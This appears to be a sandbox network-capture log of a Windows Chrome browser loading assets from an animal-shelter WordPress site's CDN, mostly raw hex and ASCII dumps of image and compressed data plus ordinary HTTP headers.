                                                                                                                                                                                                                                                        2025-01-09 01:59:12 UTC1369INData Raw: 33 9a 8e 50 67 0b aa 28 80 24 35 80 98 ad 0f 44 04 35 8f f2 e8 04 2d fa fb 00 8e 74 68 df a5 4b 58 72 1e 4f c8 1f 02 67 e5 d9 d9 e8 d6 ec ec 6c 73 79 b7 56 5b 6e d6 ea cd ad 5a 6d 8b 56 2b 01 d0 3b d0 8f 9a d5 1f 75 7d 51 e0 0a 99 11 ff b0 60 30 1c 27 cf 42 38 e6 3b 61 0d f4 a2 48 9f 5c e8 32 7f e0 6d 4b 2a 7c f0 55 ac 46 a7 d0 e4 b5 a9 49 07 3e 43 85 ae 2e 51 88 7a 48 af d0 78 9a 5a e6 c4 d9 99 93 2d 66 8f 8e 9e 9f 1c 3f 99 b8 7a f9 3b ff 73 0a f5 6f 0a 89 cf 1b 87 3c 55 d1 58 0a 4e 83 ce 3c 88 54 a7 d9 ec 16 90 b8 24 9b 0d ee 71 63 1b b0 d2 15 30 23 bb 0b 46 a3 71 6f b6 3b db dd 9a ed ee ee 2e 23 f5 7a a3 5e 6f d6 6a f5 e5 26 5b 5b cd ad 28 5f 83 36 45 e5 3c 70 1b 0a 97 48 09 30 53 06 41 fa d7 5c 08 a3 37 16 4a 66 71 04 5d 1d f8 d9 d9 8b 0b d5 f0 be 65
                                                                                                                                                                                                                                                        Data Ascii: 3Pg($5D5-thKXrOglsyV[nZmV+;u}Q`0'B8;aH\2mK*|UFI>C.QzHxZ-f?z;so<UXN<T$qc0#Fqo;.#z^oj&[[(_6E<pH0SA\7Jfq]e
                                                                                                                                                                                                                                                        2025-01-09 01:59:12 UTC1369INData Raw: ed 11 38 7b 24 56 03 4b 9b 7b 2d b4 e7 de e6 66 ab b5 83 b1 d6 d8 6c a0 4a 71 3d d1 a1 9d 9a 49 7d a3 d1 92 5a dd de 69 d7 a2 3e 9f cf ef 0d 7a e1 35 5d 5d ab 27 57 b0 d7 42 21 46 70 96 b4 27 c0 62 c5 e5 a2 d5 c0 d9 d1 e1 fc f1 f1 d3 0b b9 a4 e8 d1 f7 5e 84 da fe 83 3d a0 83 4f 84 14 5a 20 09 a4 8d 17 18 99 f3 28 d8 2b 05 54 44 08 56 ef 55 a5 2a 41 d8 ab 7b 38 af e3 e2 a2 f9 02 d4 c2 10 7b 9b 5a bb bb b6 b6 ba ba 3a b5 8e de 9d 60 40 81 89 89 cb 6f 3b da e0 f3 33 ef 40 64 2c c0 a9 18 99 20 68 4d 00 27 35 ea 51 f6 48 1b 7a b2 bc 43 e8 3e af 17 b0 cd 4a 7d 3e fa f9 cf 3b 9b 9d cd 46 7b 1b 3a 03 6c ad 9d 9d 06 e6 1a 82 f5 86 02 6d 2c cb 62 eb b0 21 a9 d7 f1 47 37 9a 89 28 63 67 f9 82 6a c7 e2 49 f5 ba 68 f3 f6 eb 2a 83 b3 f3 12 23 a5 f2 99 15 d8 85 d9 52 4e
                                                                                                                                                                                                                                                        Data Ascii: 8{$VK{-flJq=I}Zi>z5]]'WB!Fp'b^=OZ (+TDVU*A{8{Z:`@o;3@d, hM'5QHzC>J}>;F{:lm,b!G7(cgjIh*#RN
                                                                                                                                                                                                                                                        2025-01-09 01:59:12 UTC1369INData Raw: c7 9c e4 c8 48 24 32 cc 38 7d 40 8d 73 40 3c 76 ea fd bd c2 ed fe 4b 56 db 3d 50 ee 52 ae 51 7e f4 c8 02 6b 1d 41 8d 4f 1d 25 a9 5c 68 a7 b1 b7 43 7e 60 a3 dd ae b7 1a 9d bd c6 32 e9 f8 ad ee 96 50 b6 5c ab 01 37 61 2b 9a 88 85 7c 51 8d ad 9b b0 d4 f2 28 c1 36 9f b7 6f c0 6f cc e6 0d 49 1b e0 d4 b3 e3 19 f0 c3 a7 e0 4d 36 8c 3a 65 82 63 63 f9 f9 e9 4a b6 98 77 9c 52 b6 54 14 de a8 95 7e 65 4b c8 67 df f5 c6 c1 06 ce 2e d6 03 e9 3e dc 6b 0b e4 a4 18 b8 6e 18 b5 21 31 0e c3 46 01 6e 36 d6 8e 0a 1c 98 ac 90 19 18 42 7a da 90 2d c7 96 fc 24 9e 7a 66 eb 2f 62 09 d6 14 a2 e2 80 5b 29 6d 21 2b a8 0f f1 44 9e 5f 7f f2 7a 60 b3 57 74 fe e5 85 65 47 f2 c7 d2 da 89 eb 00 ea fa 93 99 5b 37 66 6e cc cd dc b8 31 a3 79 8e 2d 0d 5a fb 74 e6 f4 74 66 ee f4 74 ee 05 6f 5c
                                                                                                                                                                                                                                                        Data Ascii: H$28}@s@<vKV=PRQ~kAO%\hC~`2P\7a+|Q(6ooIM6:eccJwRT~eKg.>kn!1Fn6Bz-$zf/b[)m!+D_z`WteG[7fn1y-Zttfto\
                                                                                                                                                                                                                                                        2025-01-09 01:59:12 UTC1369INData Raw: 94 6b 80 fa 64 15 20 7f 04 dc ec bf dc 2f 55 4a f3 dd 00 ac a3 48 2e 6c 66 24 c6 dc 62 09 89 ed 28 d2 01 de 14 54 db 13 d2 04 3e fb 12 f7 53 50 23 7e db 2d 77 b7 a2 65 fd 7e 19 68 99 5f 90 4e 38 ce e8 28 de 42 78 88 d2 8f 21 5c 04 e1 d9 0b dc fc 7d 5e fc d0 90 2f cc 66 d0 52 a6 46 6b 4a cd 7a 22 f1 48 3c cb d0 f6 85 8c 53 92 b1 19 67 9d cd 65 33 3c 40 a8 d5 a3 17 13 7f db f4 80 d8 de f9 a6 06 b2 1e bc 38 a9 9d 9e 56 49 23 dd a8 46 80 81 00 64 48 33 0c b9 2e 00 4f 33 7d 66 32 c5 ce 8f 08 6e ec 03 43 fd 94 69 55 5b c8 77 b5 22 08 6d 58 10 ce 88 10 fe 63 43 02 08 dd 22 6a 62 6d 16 a8 a2 fe 2f ec 8d 3d 3f c3 a2 85 b6 26 26 b0 d9 e7 ee 60 89 50 0b 37 23 af 91 c6 c0 eb 4f 11 f0 75 cb 55 89 66 ea 63 72 cd b3 7d fd 16 3c 07 a8 60 b4 19 1d 04 51 82 da f4 22 4c 76
                                                                                                                                                                                                                                                        Data Ascii: kd /UJH.lf$b(T>SP#~-we~h_N8(Bx!\}^/fRFkJz"H<Sge3<@8VI#FdH3.O3}f2nCiU[w"mXcC"jbm/=?&&`P7#OuUfcr}<`Q"Lv
                                                                                                                                                                                                                                                        2025-01-09 01:59:12 UTC1369INData Raw: 46 46 46 f0 ef a3 23 3e 5e bd 19 19 cb e5 50 6f a2 9c 6c a6 70 a3 90 ab c8 2c 99 9b ae ce 63 8a 11 b7 b8 31 27 35 3a 27 a9 2e ca 15 cb 57 2b c5 c2 74 b5 5a d5 7b 61 9d 0c 4f 75 0e 6d 98 c5 6c a9 56 c1 e8 62 b5 24 18 a5 d2 32 fa e3 71 80 98 2f a0 42 f9 bd 22 61 77 c1 0d ad 95 e3 27 e2 a8 54 87 25 48 4b a6 0c 7b 99 08 6e 82 dd 73 99 6c 57 fa ae 90 78 f7 c9 2d a8 b7 20 b0 06 bc f6 f8 ce 0f 7e f0 83 3b 3f 79 6c 78 13 ea b6 f7 77 b6 71 10 e0 34 41 cc 38 ad 61 99 ab da 72 b7 2c ac d1 ed 38 54 06 66 ee 34 e4 f3 25 14 f7 f0 f9 42 23 d1 4c 7a 6c c4 17 1e 8b 47 d0 a2 d6 70 ef 77 89 cc 44 b1 3d db 09 fa 6d 47 2f 47 48 32 0c 04 8f 14 89 f8 9c c3 99 25 79 92 38 81 24 ec 9c 4c 73 6e 47 47 4f 5e be eb af e9 8a 7e 12 9c 5d 58 f4 fe 11 b5 19 af 1e 1f fa fb 8d d2 98 04 05
                                                                                                                                                                                                                                                        Data Ascii: FFF#>^Polp,c1'5:'.W+tZ{aOumlVb$2q/B"aw'T%HK{nslWx- ~;?ylxwq4A8ar,8Tf4%B#LzlGpwD=mG/GH2%y8$LsnGGO^~]X
                                                                                                                                                                                                                                                        2025-01-09 01:59:12 UTC1369INData Raw: 06 99 23 c3 01 bb bf 4c be c8 f8 f7 62 e5 28 fd 29 72 40 b7 71 07 50 96 68 51 54 28 08 c3 74 63 25 c1 7c 7b bc 6f 9c d6 6a 89 d8 88 fa ee 36 6b 1d cb 98 36 77 cb a1 21 3f d9 00 5e 8e e0 d7 55 43 95 fa 62 91 a1 91 70 c8 c7 3f 08 af 05 a5 3e dd 68 9a 91 6a 40 f4 66 46 07 1f 44 ea 14 2d e1 16 d6 78 f4 b0 26 d3 a5 e9 c5 35 12 21 50 77 04 ab 33 27 d3 8d 5f 1a 1b 4b 3f 3f 79 f2 06 89 ed 13 1f f8 a7 a3 b6 d7 2d f4 fe 54 63 0f 1d 16 f3 0b 78 77 b9 20 7a 4f aa f3 3c 7e ab 09 b0 5c 11 12 ac a4 de 8d 5c a2 3c bb 4d c8 4c 85 0c cc aa 32 5d ee ba e1 22 94 28 ec a6 d5 00 bf 23 f3 df 54 b0 c4 c2 27 b8 02 ac 05 bd 5e ad 9f 08 4d 29 46 29 04 53 0c da 70 27 b0 46 91 05 2a 14 90 21 25 a4 08 d8 32 d2 a9 c0 4e e4 e5 10 d5 20 4d 40 64 76 be 0a e1 21 39 e6 22 df 65 2b c5 f9 2a
                                                                                                                                                                                                                                                        Data Ascii: #Lb()r@qPhQT(tc%|{oj6k6w!?^UCbp?>hj@fFD-x&5!Pw3'_K??y-Tcxw zO<~\\<ML2]"(#T'^M)F)Sp'F*!%2N M@dv!9"e+*
                                                                                                                                                                                                                                                        2025-01-09 01:59:12 UTC1369INData Raw: 0b a8 b4 c7 74 3d 71 30 b6 7a 63 93 88 7e 84 33 13 15 68 88 a0 a2 b3 24 e9 54 61 55 0e c5 66 63 65 83 9a d5 94 ca 50 63 0b 4a 63 f0 a7 a6 b6 88 ba 31 31 cc 80 a2 1f fc f2 95 2b 72 08 ce 3b 15 fa 8c d5 f8 08 cb 3c 90 1e 13 19 be 9a b9 92 22 21 f6 05 41 76 40 16 58 4b 63 72 88 61 b0 39 60 26 99 50 25 c8 28 0b 06 74 88 7a b3 6a a1 90 44 c8 03 0c 2b 32 00 77 01 d2 6c 12 68 f0 50 0b 7e c2 1b e9 25 3e 28 52 b0 2b c0 b2 76 70 66 c1 55 9e 28 4a 95 dc 68 91 4d 6a 23 b0 0a d9 15 f6 4a 00 92 50 1b 1f f9 0a f2 58 53 18 71 a6 45 75 fb 83 63 53 e3 44 d7 f0 0d 94 f6 64 de 11 a0 3a 3f ff 39 9c cf d5 e9 a8 ed 9d 0f 9a 53 a1 5e 88 6f db 0a 3e 3a 8d ce 6e 07 13 af 55 ef f0 88 ba 11 36 1f 99 02 12 05 e0 0d 72 53 c9 90 5f 58 4b f2 e8 09 d9 82 96 8b b4 80 3b f9 dd 90 ae 15 36
                                                                                                                                                                                                                                                        Data Ascii: t=q0zc~3h$TaUfcePcJc11+r;<"!Av@XKcra9`&P%(tzjD+2wlhP~%>(R+vpfU(JhMj#JPXSqEucSDd:?9S^o>:nU6rS_XK;6


                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                        42192.168.2.449798192.0.77.394432044C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                        2025-01-09 01:59:12 UTC632OUTGET /wp-content/uploads/2025/01/stuart-768x723.png HTTP/1.1
                                                                                                                                                                                                                                                        Host: 149955744.v2.pressablecdn.com
                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                        Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                                        Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                        Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                        Sec-Fetch-Dest: image
                                                                                                                                                                                                                                                        Referer: https://indyhumane.org/
                                                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                        2025-01-09 01:59:12 UTC599INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                        Date: Thu, 09 Jan 2025 01:59:12 GMT
                                                                                                                                                                                                                                                        Content-Type: image/png
                                                                                                                                                                                                                                                        Content-Length: 572544
                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                        Link: <http://indyhumane.org/wp-content/uploads/2025/01/stuart-768x723.png>; rel="canonical"
                                                                                                                                                                                                                                                        Last-Modified: Wed, 08 Jan 2025 17:22:33 GMT
                                                                                                                                                                                                                                                        Expires: Thu, 16 Jan 2025 01:59:12 GMT
                                                                                                                                                                                                                                                        Cache-Control: max-age=604800
                                                                                                                                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                        Access-Control-Allow-Methods: GET, HEAD
                                                                                                                                                                                                                                                        X-ac: 2.jfk _atomic_dca MISS
                                                                                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                        Strict-Transport-Security: max-age=15552000
                                                                                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                        X-nc: MISS jfk 2
                                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                                        2025-01-09 01:59:12 UTC770INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 03 00 00 00 02 d3 08 06 00 00 00 a1 5c 65 bb 00 00 00 09 70 48 59 73 00 00 0e c4 00 00 0e c4 01 95 2b 0e 1b 00 00 20 00 49 44 41 54 78 9c ec bd 79 ac a5 e7 5d e7 f9 79 9e e7 5d ce 72 b7 5a 5d ae 2a 97 ed 78 49 62 9c 4a 62 1c c7 d9 08 59 81 34 43 42 08 84 81 86 51 0f 1a ba 99 1e 69 34 ea 85 19 b5 50 13 8d 10 42 ad 56 0b f5 a0 ee 61 34 62 98 99 ce 40 03 e9 00 81 4e 87 74 27 71 12 e3 25 8e 1d db f1 ee 72 f9 ba 5c cb ad bb 9e e5 3d ef f2 2c f3 c7 ef 3d e7 5e 9b 84 2c ae dd cf 47 3a ba 4b dd 73 ce 7b 6e dd f3 be bf e5 fb fb fe 20 12 89 44 22 91 48 24 12 89 44 22 91 48 24 12 89 44 22 91 48 24 12 89 44 22 91 48 24 12 89 44 22 91 48 24 12 89 44 22 91 48 24 12 89 44 22 91 48 24 12 89 44 22 91 48 24 12 89 44 22
                                                                                                                                                                                                                                                        Data Ascii: PNGIHDR\epHYs+ IDATxy]y]rZ]*xIbJbY4CBQi4PBVa4b@Nt'q%r\=,=^,G:Ks{n D"H$D"H$D"H$D"H$D"H$D"H$D"H$D"H$D"
                                                                                                                                                                                                                                                        2025-01-09 01:59:12 UTC1369INData Raw: 83 bc 91 57 c6 26 f0 69 e0 cf 11 0b d2 13 b1 23 10 89 44 22 91 c8 f7 4e bc 7a 46 22 e7 88 10 c2 6e 44 d6 f3 1e 64 88 f7 76 64 80 37 72 6e 39 0d 7c 05 e9 08 7c 05 59 4a 16 3b 02 91 c8 65 40 2b 89 9c ca 1d e7 10 e3 83 25 44 06 a9 91 99 20 8d 38 87 d5 88 95 f0 2a 62 27 5c 03 85 52 ca fe cd 47 8e 44 22 df 0b 31 01 88 44 5e 01 ad 5d e7 61 e0 4e a4 da 3f d5 f5 27 17 f1 b0 5e 2d ac 20 4b c8 fe 03 f0 59 e0 78 0c 0c 22 91 4b 8b 10 c2 1c 62 6e f0 1a 64 b3 f8 1b 90 80 5f 23 41 ff 74 29 e1 74 77 c9 ce 64 de 02 25 92 04 94 ed d7 27 81 47 90 7d 23 8f 29 a5 06 17 e4 85 44 22 57 18 31 01 88 44 be 07 da 80 1f e4 42 75 1d f0 f7 81 9f 41 2a 59 0b 48 65 2b 72 e1 f0 48 65 70 13 09 08 fe 09 51 1a 14 89 5c 50 5e 76 5e 4c 90 0e e8 db 11 b3 83 a3 c8 f9 31 6b 3f f6 78 65 66 07 16
                                                                                                                                                                                                                                                        Data Ascii: W&i#D"NzF"nDdvd7rn9||YJ;e@+%D 8*b'\RGD"1D^]aN?'^- KYx"Kbnd_#At)twd%'G}#)D"W1DBuA*YHe+rHepQ\P^v^L1k?xef
                                                                                                                                                                                                                                                        2025-01-09 01:59:12 UTC1369INData Raw: 67 81 df 51 4a 9d be c8 c7 13 79 15 13 42 b8 0e 91 eb dc 82 54 f6 0f ef b8 c5 ea fe b9 c3 23 d2 c0 cf 02 bf 0f dc 17 0b 00 91 2b 95 4b f2 ca 1b 89 9c 6f 5a 6f ff 9f 40 36 c7 de ce 25 50 31 13 79 ce 80 b5 d5 35 96 97 9f e7 f8 73 c7 78 fe b9 63 9c 39 79 82 8d 8d 75 c6 e5 04 6f 2d a9 51 2c 2d 2d e2 bc a3 ae 1b 96 96 76 a1 8d e6 ec d9 b3 ac 6f 0e 18 0e 87 d4 55 3d d3 ea 2b ad 18 8d c6 04 6b e9 b6 d5 77 17 1c c1 79 b2 3c 63 71 f7 12 49 9a 52 55 25 f8 80 b7 81 b2 1c 63 14 e0 2c 9d 6e 97 cd a2 64 6b 30 c6 68 03 28 7a 9d 94 7e b7 c3 ea c6 16 26 31 e4 59 8a d1 9a 44 2b b4 52 e4 69 8e f3 0e e7 1a 8a c9 04 a5 13 b4 82 c5 c5 45 ae 3e 78 98 4e 7f 81 5b 6e 3d ca ed 77 dc c1 4d af 7d 1d bb 77 ef c1 7c 8b 99 82 4b 80 11 e2 1a f2 cf 94 52 f7 5d ec 83 89 bc 3a 68 cf 4f 47
                                                                                                                                                                                                                                                        Data Ascii: gQJyBT#+KoZo@6%P1y5sxc9yuo-Q,--voU=+kwy<cqIRU%c,ndk0h(z~&1YD+RiE>xN[n=wM}w|KR]:hOG
                                                                                                                                                                                                                                                        2025-01-09 01:59:12 UTC1369INData Raw: 6f f0 cc d3 4f f2 f4 93 8f b3 bc 7c 8c ba aa 18 8f c7 28 25 c1 fb 68 3c a6 ae 1d 49 a2 21 80 f3 6d c0 9d a5 80 a2 6a 2c 45 d9 e0 ac c7 5a 47 50 52 99 6f ac c3 07 8f 52 0a a3 8d 74 0c 5a ff ff 34 cd d0 1a ca aa 46 6b c8 d2 94 c4 68 14 1a e7 e5 79 b5 92 bd 00 4a 69 02 1e 17 3c 79 db 45 a8 cb 9a c6 5a d2 2c c7 18 43 5d 95 18 ad 08 de b7 9e fe 09 89 31 a4 59 42 37 cf 31 46 33 1c 8d a8 9b a6 5d 10 a6 b0 8d 43 01 bd 5e 97 5d 4b bb b0 d3 ce 86 49 c8 f2 0e 45 31 86 10 58 5a 5c a0 93 77 39 70 e0 00 ce 07 8a c9 98 c9 a4 c4 07 cf 60 6b 8b aa 9c 70 cd 91 c3 fc d0 bb df c3 d1 a3 6f e6 96 5b 8f 72 f8 c8 b5 97 8a 8d e8 08 f8 1c f0 5b c0 d7 be 9d 24 28 84 90 20 da ee 12 58 8d d2 a1 57 17 21 84 05 24 f0 ff 38 e2 36 f6 1a 5e c5 db c5 43 08 84 10 f0 de 53 57 35 1b 9b 9b 0c
                                                                                                                                                                                                                                                        Data Ascii: oO|(%h<I!mj,EZGPRoRtZ4FkhyJi<yEZ,C]1YB71F3]C^]KIE1XZ\w9p`kpo[r[$( XW!$86^CSW5
                                                                                                                                                                                                                                                        2025-01-09 01:59:12 UTC1369INData Raw: 3c cf 49 92 84 da 3a 26 c5 84 ba ae 5a 69 4f 4a d3 34 d4 95 58 1c 77 ba 39 69 9a b5 e7 15 85 36 90 18 83 6d 2c 55 5d 91 25 99 cc 0a f5 fa 5c 7d f0 10 d7 df 78 03 47 8f be 91 1f 38 7a 94 bd 7b f6 a2 2f cc 5e 91 1a f8 22 f0 db c8 f6 e0 98 04 44 2e 1b 62 02 10 b9 a2 08 21 dc 8a 0c fb 7e 84 f3 7c 11 1e 8f 46 7c f6 33 7f c6 17 3f ff 97 9c 3a 75 82 b3 6b eb 14 45 41 d3 38 b4 32 04 2d 95 75 09 92 6b 46 a3 09 55 5d 63 ad 93 20 58 81 49 12 52 63 64 d8 d7 5a ac f7 38 eb 48 92 04 63 0c de b9 59 2b 5d 69 25 5a ff 69 40 df 0e e3 7a ef 67 15 fd e9 f7 ac b5 b3 9f 03 66 15 f2 34 49 51 4a d1 d8 06 e7 3d 84 80 d6 7a 16 dc 4f ef af 66 89 44 78 49 c2 e0 db 39 00 ad 35 de 39 68 9f 73 fa b3 b3 63 6d ef b3 f3 98 d2 2c 6d bf f6 a8 00 5a 69 9c 6f 03 02 63 30 4a 71 f0 ea 03 74 bb
                                                                                                                                                                                                                                                        Data Ascii: <I:&ZiOJ4Xw9i6m,U]%\}xG8z{/^"D.b!~|F|3?:ukEA82-ukFU]c XIRcdZ8HcY+]i%Zi@zgf4IQJ=zOfDxI959hscm,mZioc0Jqt
                                                                                                                                                                                                                                                        2025-01-09 01:59:12 UTC1369INData Raw: 5f 3c c1 5f df f5 45 ee bd fb 4b 6c 6c ac 53 8c c7 6c 6c 6c 32 98 14 54 b5 a5 a9 1b 9c 0f 94 65 89 0d 1e a3 35 ce 79 ac 93 e1 38 05 e2 ed ef 44 d6 e2 bd 6f 35 f6 a2 7d f5 6d 20 2d 92 9c ed 81 60 a3 94 f8 f0 a3 98 94 25 4d bb 99 d7 68 09 f2 95 f2 ed 46 5e e9 20 24 89 c1 24 0a 5b 3b 1a 6b d1 ad a3 90 75 6e e6 e6 33 4d 34 92 c4 a0 82 54 f5 41 82 7b 63 0c 4d d3 10 80 24 69 93 88 1d 03 ca b3 8f b3 21 e2 80 6a 25 46 3b 13 8a 9d 1f bf dd ef 75 9a 24 c8 eb 36 cc f5 fa f4 ba 1d ba 9d 0c 93 68 e6 e7 e6 b1 4d 83 6d 1c 83 d1 88 34 35 cc f5 ba 5c b5 f7 2a 99 35 c0 01 01 8f e2 85 13 2f 52 37 a2 98 09 3e b0 d0 ef f1 f6 db df cc 4d 6f 78 13 a7 4e 9d e1 96 5b 6e e1 e8 9b 6e 63 d7 9e bd ec d9 bb 97 6e b7 7b 39 76 07 be 5b 4e 20 2e 25 ff 09 99 2d 58 89 c3 c5 df 1d ed 39 e5
                                                                                                                                                                                                                                                        Data Ascii: _<_EKllSlll2Te5y8Do5}m -`%MhF^ $$[;kun3M4TA{cM$i!j%F;u$6hMm45\*5/R7>MoxN[nncn{9v[N .%-X9
                                                                                                                                                                                                                                                        2025-01-09 01:59:12 UTC1369INData Raw: 5a 31 df eb d0 eb e4 a4 49 4a ed a4 23 99 67 19 55 55 61 ad c5 b6 89 80 74 4f 45 b6 14 bc 23 00 b5 6b 66 b6 c8 a9 36 1c d8 bf 8f f7 be ef fd fc f4 cf fe 3c 37 dc 74 f3 f9 74 0f 7b 06 f8 87 4a a9 cf 9d af 27 88 44 5e 09 97 bd 6f 5e e4 d5 49 08 e1 08 f0 3f 22 03 79 e7 3c f8 0f 21 70 ea e4 49 3e f3 a7 ff 81 fb ef 15 7b cf ba 2a 29 8b 12 57 5b 5c e3 a9 cb 1a 17 e4 42 93 6a f0 1a d0 12 e4 5a 17 70 1e 94 0f 28 6d 30 2a c8 41 ee 18 ba 9d 62 12 43 9a a4 48 80 0e 89 92 6d c0 4a c9 c0 5b 53 5b dc 74 00 4e 4d 03 f1 1d c5 db 36 e8 97 60 5a cd 86 e5 d2 24 91 f6 ba b5 ad 34 28 65 67 8c 1b c2 74 98 b7 1d 2e 0e 0a e7 1d 75 23 9d 8f e0 43 eb aa 93 e3 7d 60 52 96 ed e6 61 b9 c8 1a 6d e8 a4 29 a0 db 8a 9b 45 02 fc 69 42 22 b3 0d db c7 aa 5e d2 15 78 c9 1e 02 ef d1 68 1c 9e
                                                                                                                                                                                                                                                        Data Ascii: Z1IJ#gUUatOE#kf6<7tt{J'D^o^I?"y<!pI>{*)W[\BjZp(m0*AbCHmJ[S[tNM6`Z$4(egt.u#C}`Ram)EiB"^xh
                                                                                                                                                                                                                                                        2025-01-09 01:59:12 UTC1369INData Raw: 49 c8 f3 1c a3 35 d6 7a ea aa 41 69 19 b5 b5 d6 12 bc a7 df eb b1 67 ef 6e ca b2 e2 ec d9 0d 19 36 d6 b0 73 a6 60 a7 0b 90 54 ea c4 36 74 67 c0 bf fd b5 74 21 b4 31 e8 56 42 24 2e 48 1a 15 60 ae df a3 df eb e3 9c a7 b6 56 02 17 6b d9 bd 7b 91 4e 37 a7 ae 2d c5 48 5e 8b f3 8e 6e 9e b1 6b 71 9e 6b af bd 96 62 34 62 f9 d4 09 46 45 49 5d 59 40 93 77 b3 d6 1a 55 a3 54 60 a1 d7 63 61 7e 9e 8f fd ec 2f f0 91 8f fd 0c 57 5d 7d f5 95 b0 58 ec 7c 30 ad ba 5b 44 e7 fc 28 db 9d 83 db 91 60 7d 19 99 3b 78 bc fd 37 8f 04 e1 8b 48 80 3f b5 62 3a 88 c8 f7 16 5e f6 1c fa db 7c 9c 3e ff cb 3b 7e d3 63 7a f9 fd 5f fe bd cb ca b5 67 ea c0 b3 b5 39 60 79 79 99 fb ef bf 9f af de fd 55 4e 9c 78 9e e0 3d de 79 d2 34 a1 d7 4d 99 ef cf 91 e7 1d ca aa 6a df 4a 9e 5d bb 77 89 ed ae
                                                                                                                                                                                                                                                        Data Ascii: I5zAign6s`T6tgt!1VB$.H`Vk{N7-H^nkqkb4bFEI]Y@wUT`ca~/W]}X|0[D(`};x7H?b:^|>;~cz_g9`yyUNx=y4MjJ]w
                                                                                                                                                                                                                                                        2025-01-09 01:59:12 UTC1369INData Raw: 2e ef 1b dc 74 6f 40 08 a4 ed 86 74 67 2d 75 53 b7 05 08 8b 6a 77 a6 a8 d6 05 4d 16 24 ca 39 c9 39 49 fa 51 6a c7 63 33 3b ff 05 1f 28 ab 9a c7 1f 7f 0c df 34 5c 7b dd f5 2c 2c 2e 9c 6b 53 80 04 b8 16 59 1c f7 e4 af ff fa af 9f f9 c4 27 3e 71 2e 1f 3f 12 f9 9e 89 3d ee c8 65 41 08 e1 3a 64 cb ef fb cf f5 63 bf 78 e2 05 ee bf ef af b9 eb ae 2f f1 d0 43 0f 31 d8 d8 c4 68 18 4f 4a 06 a3 31 8a 40 08 8a 49 55 13 bc 5c b8 9c 0f 14 75 43 6d 1d 21 a8 76 28 cd cc 2e 56 c6 88 97 b5 86 d6 fd 42 2a 62 46 6b b4 91 16 b8 77 8e 24 4d f1 0a 9a a6 86 a0 70 3e 60 ad 38 e9 78 b6 93 81 e0 fd cc bd c7 35 cd df b0 e3 94 44 80 d6 df db cd fe 5d aa 6a 66 56 75 6b 9a e6 25 17 eb ed ad bc a1 d5 ce 6e 3f 66 96 a5 6d 95 bf 9e 75 06 24 60 df 4e 66 5a 63 a1 59 57 61 ba b0 0c da 39 86
                                                                                                                                                                                                                                                        Data Ascii: .to@tg-uSjwM$99IQjc3;(4\{,,.kSY'>q.?=eA:dcx/C1hOJ1@IU\uCm!v(.VB*bFkw$Mp>`8x5D]jfVuk%n?fmu$`NfZcYWa9
                                                                                                                                                                                                                                                        2025-01-09 01:59:12 UTC1369INData Raw: cc d2 d4 87 30 b3 19 4d f3 1c 94 62 71 69 91 f5 f5 75 26 45 41 c8 12 fa bd 2e ce 39 06 83 2d 9e 3b f6 0c ff c7 bf fd df 78 f0 be 7b f9 f8 7f fd 73 5c 7f e3 cd 24 c9 77 ae 0a 4e 6d 51 b5 12 1b d6 e1 60 8b 24 49 99 9b 9f 3f d7 55 c5 c8 65 c0 74 a0 b7 ae 6b d6 d7 d6 f8 e6 37 bf c9 13 8f 3f ce d3 cf 3c 4d 63 6b f2 3c 63 34 1a 92 65 69 5b 8d 96 ce e3 ae 25 09 f2 d3 24 65 30 1a b1 b4 30 47 d3 fe fd 26 5a 51 5a c7 e6 d6 26 76 02 c3 49 cd d6 d6 16 e5 62 97 24 28 b0 8e 6a 52 a2 93 84 8d cd 4d c6 93 02 a3 0d 55 d5 d0 34 8e e0 ab 99 24 67 67 a1 22 78 d5 56 f3 15 29 9a d1 68 8c 0b 43 9a a6 41 01 59 96 11 02 64 79 67 47 b7 73 7b 13 78 bd c3 8e 74 fa da 41 66 9e 94 52 db 9d 82 56 d4 68 8c 41 07 83 f3 a2 d9 f7 de b5 ee 67 d0 58 99 73 b0 5e e6 95 3c d2 59 1c 34 5b 98 5d
                                                                                                                                                                                                                                                        Data Ascii: 0Mbqiu&EA.9-;x{s\$wNmQ`$I?Uetk7?<Mck<c4ei[%$e00G&ZQZ&vIb$(jRMU4$gg"xV)hCAYdygGs{xtAfRVhAgXs^<Y4[]


                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                        43192.168.2.449799192.0.77.394432044C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                        2025-01-09 01:59:12 UTC426OUTGET /wp-content/themes/thrive-theme/inc/assets/dist/frontend.min.js?ver=10.4.2 HTTP/1.1
                                                                                                                                                                                                                                                        Host: 149955744.v2.pressablecdn.com
                                                                                                                                                                                                                                                        Connection: keep-alive
